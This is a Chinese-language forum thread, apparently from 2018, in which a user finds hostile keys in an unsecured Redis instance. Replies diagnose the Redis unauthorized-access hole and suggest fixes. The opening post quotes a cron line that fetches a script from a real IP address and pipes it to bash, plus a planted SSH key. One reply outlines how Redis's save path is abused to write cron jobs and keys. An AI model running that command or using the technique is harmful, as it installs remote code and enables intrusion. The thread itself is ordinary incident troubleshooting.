一条内容是
-e
*/10 * * * * curl -s http://207.226.143.174:443/reinstall.sh | bash
另一条是
ssh-a xxxxxxxxxx...
root@hxkvm
不是很明白,目前只开放了 redis mysql 和 ssh 这三个端口
This topic created in 3007 days ago, the information mentioned may be changed or developed.
Supplement 1 · Mar 28, 2018
关了 ,先用本地 docker 了
 |
1
tomczhen Mar 28, 2018
请个运维吧,兼职的也行。
|
 |
2
ericls Mar 28, 2018 via iPhone
你看看你的 authorized_keys 有没有被串改?
|
 |
4
dltsgl Mar 28, 2018
redis 没密码吧?被人远程攻击了?
|
 |
5
iamsee Mar 28, 2018
这是被攻击了
|
 |
7
SakuraKuma Mar 28, 2018
装好没启动之前就应该设置密码。
|
 |
8
loongwang OP @SakuraKuma。。。gg,先用着了
|
 |
9
airycanon Mar 28, 2018
redis-cli 然后 CONFIG GET dir 看看值是什么。
|
 |
11
lairdnote Mar 28, 2018
兼职的运维要吗?
|
 |
12
msg7086 Mar 28, 2018
被人入侵了的话:
1. 如果你 root 账号被人拿到的话,除了重装系统,你不可能把系统弄干净。 2. 如果你服务器被人入侵以后干坏事的话,你需要付法律责任。 |
 |
13
SourceMan Mar 28, 2018
redis 不是默认改端口、禁外网的吗?
|
 |
14
abmin521 Mar 28, 2018
redis 未授权漏洞
|
 |
15
julyclyde Mar 29, 2018
这格式像 crontab 啊
问题是 crontab 不能通过网络注入吧? |
|
17
airycanon Apr 24, 2018
未读提醒有问题,没看到你的回复。
你需要注意 redis 配置的 dir 和 dbfilename,因为 redis 在执行 bgsave 的时候会把 key 写入文件 dir/dbfilename 中。 第一个 key 如果写入 /var/spool/cron 里,就可以变成 crontab 定时任务。 第二个 key 很明显就是 ssh 公钥了,可以直接 ssh 登录。 如果你的 redis 需要开放到公网,不要用 root 用户启动,最好加个验证并设置 bing ip。 |
Select Language